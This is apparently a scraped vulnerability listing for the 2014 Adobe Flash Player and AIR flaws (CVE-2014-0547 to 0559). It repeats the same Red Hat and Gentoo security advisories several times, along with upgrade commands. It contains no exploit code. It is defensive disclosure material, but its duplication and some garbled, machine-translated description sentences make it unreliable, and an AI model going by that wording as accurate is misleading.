http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 do not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism via unspecified vectors. Adobe Flash Player and AIR are prone to multiple unspecified memory-corruption vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Attackers can exploit this vulnerability to bypass the ASLR protection mechanism and take control of the affected system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-0559. This vulnerability is CVE-2014-0559 This is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts likely result in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to bypass intended access restrictions via unspecified vectors. Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. (CVE-2014-0548) All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.406. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, and CVE-2014-0552. This vulnerability CVE-2014-0547 , CVE-2014-0549 , CVE-2014-0550 , CVE-2014-0551 and CVE-2014-0552 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 